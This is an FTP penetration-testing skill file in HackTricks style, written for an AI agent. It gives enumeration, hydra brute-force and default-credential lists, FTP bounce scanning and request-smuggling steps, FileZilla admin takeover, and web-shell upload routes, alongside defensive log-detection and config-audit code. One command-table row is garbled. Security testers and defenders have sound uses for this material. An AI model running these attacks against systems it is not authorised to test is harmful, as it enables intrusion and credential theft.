Hacktricks-skills ftp-pentesting

Perform FTP server pentesting including enumeration, authentication testing, anonymous access checks, FTP bounce attacks, and post-exploitation. Use this skill whenever the user mentions FTP, port 21, file transfer protocol, FTP servers, anonymous FTP, FTP brute force, FTP bounce attacks, or any FTP-related security testing. This skill covers banner grabbing, credential testing, configuration analysis, and exploitation techniques for FTP services.

Install: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-ftp/pentesting-ftp/SKILL.MD

FTP Pentesting Skill

This skill helps you perform comprehensive security testing against FTP (File Transfer Protocol) servers on port 21.

Quick Start

When testing an FTP server, follow this workflow:

  1. Enumerate - Banner grab, check for anonymous access, run nmap scripts
  2. Authenticate - Test default credentials, brute force if needed
  3. Explore - List files, check permissions, download/upload test files
  4. Exploit - FTP bounce attacks, configuration weaknesses, post-exploitation

Enumeration

Banner Grabbing

Get initial information about the FTP server:

# Basic banner grab
nc -vn <IP> 21

# Get certificate if STARTTLS is supported
openssl s_client -connect <IP>:21 -starttls ftp

# Connect via telnet for raw protocol inspection
telnet <IP> 21

Nmap Enumeration

Run comprehensive FTP scans:

# Basic service detection with default scripts
sudo nmap -sV -p21 -sC -A <IP>

# All FTP-specific scripts
nmap --script ftp-* -p 21 <IP>

# Anonymous login and bounce checks (included in -sC)
nmap -sC -p21 <IP>

Manual Command Enumeration

Connect and query the server for supported commands:

ftp <IP>
> HELP      # List supported commands
> FEAT      # Show server features
> STAT      # Server status and version info

Look for these indicators in the output:

  • AUTH TLS - Server supports encrypted connections
  • PASV - Passive mode supported
  • PORT - Active mode supported (potential bounce attack vector)
  • MLSD/MLST - Machine-readable directory listings

Anonymous Login Testing

Test common anonymous credentials:

# Standard anonymous login
ftp <IP>
> anonymous
> anonymous
> ls -a          # List all files including hidden
> binary        # Set binary transfer mode
> bye

# Alternative anonymous credentials to try
# anonymous : anonymous
# anonymous : (empty password)
# ftp : ftp

Browser Connection

Quick access via browser:

# Firefox/Chrome can connect directly
ftp://anonymous:anonymous@<IP>
ftp://<username>:<password>@<IP>

Connection Techniques

Active vs Passive Mode

Active FTP:

  • Client initiates control connection from its port N to server port 21
  • Client listens on port N+1 for the data connection and tells the server that port
  • Server initiates data connection back to client
  • Problematic if client has firewall blocking incoming connections

Passive FTP:

  • Client initiates control connection to port 21
  • Client sends PASV command
  • Server provides port M for data connection
  • Client initiates data connection to server port M
  • Works better through firewalls

Using lftp with TLS

lftp
lftp :~> set ftp:ssl-force true
lftp :~> set ssl:verify-certificate no
lftp :~> connect <IP>
lftp <IP>:~> login <username> <password>

Debugging Connections

Enable verbose output to see protocol details:

ftp <IP>
> debug     # Enable debug mode
> trace     # Enable trace mode

FTP Commands Reference

Authentication

| Command | Description |
|---|---|
| USER <username> | Send username |
| PASS <password> | Send password |

File Operations

| Command | Description |
|---|---|
| LIST | List files in current directory |
| LIST -R | Recursive listing (if allowed) |
| RETR <file> | Download file |
| STOR <file> | Upload file (overwrites if exists) |
| APPE <file> | Append to file |
| STOU <file> | Store unique (no-op if exists) |
| PUT <file> | Upload local file |
| TYPE i | Set binary transfer mode |
| TYPE a | Set ASCII transfer mode |

Connection Control

| Command | Description |
|---|---|
| PASV | Enable passive mode |
| PORT <ip,port> | Set active mode data connection |
| `EPRT2 | |
| REST <byte> | Resume transfer from byte offset |

Directory Operations

| Command | Description |
|---|---|
| CWD <dir> | Change working directory |
| PWD | Print working directory |
| MKD <dir> | Make directory |
| RMD <dir> | Remove directory |
| DELE <file> | Delete file |

Information

| Command | Description |
|---|---|
| HELP | List supported commands |
| FEAT | Show server features |
| STAT | Server status |
| SYST | System type |
| NOOP | No operation (keepalive) |

Downloading Files

Using wget

# Download entire FTP site
wget -m ftp://<user>:<pass>@<IP>

# Force active mode (if passive disabled)
wget -m --no-passive ftp://<user>:<pass>@<IP>

# With special characters in credentials
wget -r --user="USERNAME" --password="PASSWORD" ftp://<IP>/

Using curl

# Download single file
curl -u <user>:<pass> ftp://<IP>/path/to/file

# List directory
curl -u <user>:<pass> ftp://<IP>/

Brute Force Attacks

Using hydra

# Basic brute force with username
hydra -t 1 -l <username> -P <password_list> <IP> ftp

# With wordlist for both username and password
hydra -t 1 -L <user_list> -P <pass_list> <IP> ftp

# Verbose output
hydra -t 1 -l <username> -P <password_list> -vV <IP> ftp

Default Credentials

Test these common FTP credentials:

  • anonymous:anonymous
  • anonymous: (empty password)
  • ftp:ftp
  • admin:admin
  • root:root
  • daemon:daemon
  • nobody:nobody

Reference: SecLists FTP defaults
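
Seen from the server side, the credential guessing described above leaves a run of failed logins per client. The following is an added example, not part of the original skill: it flags repeated failures from one client and a successful login that follows them. The log line shape is an assumption modelled on vsftpd's log, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed line shape (vsftpd-style); adjust the regex for other servers.
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect(lines, threshold=5, window_s=1800):
    """Return alerts for repeated failures per client and for a success that follows them."""
    fails = defaultdict(list)              # client ip -> [(time, username)]
    alerts, alerted = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip = m["ip"]
        # keep only the failures that are still inside the sliding window
        fails[ip] = [(t, u) for t, u in fails[ip]
                     if (ts - t).total_seconds() <= window_s]
        if m["result"] == "FAIL":
            fails[ip].append((ts, m["user"]))
            if len(fails[ip]) >= threshold and ip not in alerted:
                alerted.add(ip)
                users = {u for _, u in fails[ip]}
                kind = "password-guessing" if len(users) == 1 else "username-spray"
                alerts.append((kind, ip, len(fails[ip])))
        elif len(fails[ip]) >= threshold:
            # a login that succeeds right after a failure run deserves review
            alerts.append(("success-after-failures", ip, m["user"]))
    return alerts

# Constructed sample: one user mistyping once, one client failing once a minute
SAMPLE = [
    'Tue Mar 12 10:00:00 2024 [pid 901] [alice] FAIL LOGIN: Client "192.0.2.10"',
    'Tue Mar 12 10:00:20 2024 [pid 902] [alice] OK LOGIN: Client "192.0.2.10"',
] + [
    f'Tue Mar 12 10:{i:02d}:00 2024 [pid {910 + i}] [admin] FAIL LOGIN: Client "198.51.100.23"'
    for i in range(1, 7)
] + ['Tue Mar 12 10:07:00 2024 [pid 917] [admin] OK LOGIN: Client "198.51.100.23"']
```

With window_s=180 the same sample raises no alert, because one failure per minute never puts five inside three minutes; size the window for slow, single-connection guessing as well as bursts.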

FTP Bounce Attacks

Some FTP servers allow the PORT command to redirect connections to arbitrary hosts. This can be used for:

  • Port scanning through the FTP server
  • Sending arbitrary data to other services
  • Downloading files from other FTP servers

Port Scanning via FTP Bounce

# The PORT command format: PORT h1,h2,h3,h4,p1,p2
# IP: 127.0.0.1, Port 80 = PORT 127,0,0,1,0,80

ftp <vulnerable_ftp_server>
> PORT 127,0,0,1,0,80
> LIST

If the target port is open, the server will attempt to connect and you'll see a different error than if it's closed.

Sending HTTP Requests via FTP Bounce

  1. Create a file with the HTTP request (use 0x0d 0x0a for line endings)
  2. Upload to the vulnerable FTP server
  3. Use REST to skip any header bytes
  4. Use PORT to connect to target HTTP server
  5. Use RETR to send the request

# Example: Create request file
echo -e "GET /admin HTTP/1.1\r\nHost: target\r\n\r\n" > request.txt

# Upload to FTP
ftp <vulnerable_server>
> binary
> PUT request.txt

# Send to target
> PORT <target_ip>,<target_port>
> REST 0
> RETR request.txt

Note: The connection may timeout. Workarounds:

  • Repeat the request multiple times (~0.5MB)
  • Fill with protocol-appropriate junk data
  • Use null characters to pad the request

FileZilla Server Vulnerability

FileZilla Server often binds an administrative service to port 14147 on localhost with no password.

Exploitation Steps

  1. Create a tunnel to port 14147 (via SSH, reverse shell, etc.)
  2. Connect to the admin interface with blank password
  3. Create a new FTP user with full access
  4. Use the new credentials to access FTP

Configuration Analysis

Common Config Files

| File | Service |
|---|---|
| /etc/vsftpd.conf | vsFTPd |
| /etc/proftpd.conf | ProFTPD |
| /etc/ftp.conf | Generic FTP |
| /etc/ftpusers | Denied users |

Dangerous vsFTPd Settings

Check for these insecure configurations:

# Anonymous access enabled
anonymous_enable=YES

# Anonymous upload allowed
anon_upload_enable=YES
anon_mkdir_write_enable=YES

# Anonymous root directory
anon_root=/home/username/ftp

# Ownership changes on upload
chown_uploads=YES
chown_username=username

# Local user access
local_enable=YES

# Write permissions
write_enable=YES
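
One way to check a config for the settings above, as an added example (not code from the original skill or from vsftpd): it judges the options in combination, since the anon_* write options only take effect when write_enable is also on. The ssl_enable option and the DEFAULTS table come from vsftpd.conf(5) rather than this page and are assumptions to verify; both sample configs are constructed.

```python
# Defaults from upstream vsftpd.conf(5) for options that may be absent from the file
# (assumption: verify against the man page of the deployed build).
DEFAULTS = {"anonymous_enable": "YES", "chown_username": "root"}

def parse_conf(text):
    """vsftpd syntax: option=value, no spaces around '=', '#' starts a comment line."""
    conf = dict(DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip().lower()] = value.strip()  # assumption: last occurrence wins
    return conf

def audit(text):
    """Return finding ids for the settings listed in the section, judged in combination."""
    conf = parse_conf(text)
    on = lambda key: conf.get(key, "NO").upper() == "YES"
    anon, write = on("anonymous_enable"), on("write_enable")
    findings = ["anonymous-login"] if anon else []
    # anon_* write options only take effect when write_enable is YES as well
    for opt, name in (("anon_upload_enable", "anonymous-upload"),
                      ("anon_mkdir_write_enable", "anonymous-mkdir")):
        if on(opt):
            findings.append(name if anon and write else name + "-latent")
    if on("chown_uploads"):
        root = conf["chown_username"] == "root"
        findings.append("uploads-chowned-to-root" if root else "uploads-chowned")
    if on("local_enable") and write:
        findings.append("local-users-can-write")
    if not on("ssl_enable"):
        findings.append("no-tls")  # credentials cross the wire in plaintext
    return findings

# Constructed sample: the settings listed in the section above
WEAK = """\
anonymous_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
chown_uploads=YES
chown_username=username
local_enable=YES
write_enable=YES
"""
# Constructed sample: a read-only, TLS-enabled configuration for comparison
HARDENED = "anonymous_enable=NO\nlocal_enable=YES\nwrite_enable=NO\nssl_enable=YES\n"
```

A "-latent" finding marks an anonymous write option that is set but currently inert; it becomes live as soon as write_enable is switched on, so remove it rather than rely on the other setting.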

XAMPP/ProFTPD Webroot Mapping

XAMPP often maps the FTP root to /opt/lampp/htdocs. Weak credentials on service accounts (daemon, nobody) can allow:

  1. Uploading PHP web shells directly to webroot
  2. Executing arbitrary code via web interface
  3. Full system compromise

Post-Exploitation

Metasploit FTP Modules

# Anonymous login scanner
msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS <IP>; run; exit'

# FTP version scanner
msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS <IP>; run; exit'

# Bison FTP traversal
msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS <IP>; run; exit'

# Colorado FTP traversal
msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS <IP>; run; exit'

# Titan FTP XCRC traversal
msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS <IP>; run; exit'

Shodan Queries

Find FTP servers on Shodan:

  • ftp
  • port:21
  • ftp anonymous
  • vsftpd

Common Issues and Solutions

Connection Timeouts

  • Try a different connection mode: wget --no-passive (forces active mode) or lftp with set ftp:ssl-force
  • Check firewall rules on both client and server
  • Use telnet or nc to verify the port is open

Transfer Mode Issues

  • Use binary mode for non-text files
  • Use ascii mode for text files
  • Check with the TYPE command

Permission Denied

  • Check if anonymous upload is enabled
  • Look for writable directories
  • Try different user accounts

Security Considerations

FTP transmits credentials in plaintext. Always:

  • Use FTPS (FTP over TLS) when available
  • Consider SFTP or SCP for secure transfers
  • Never use FTP for sensitive data without encryption
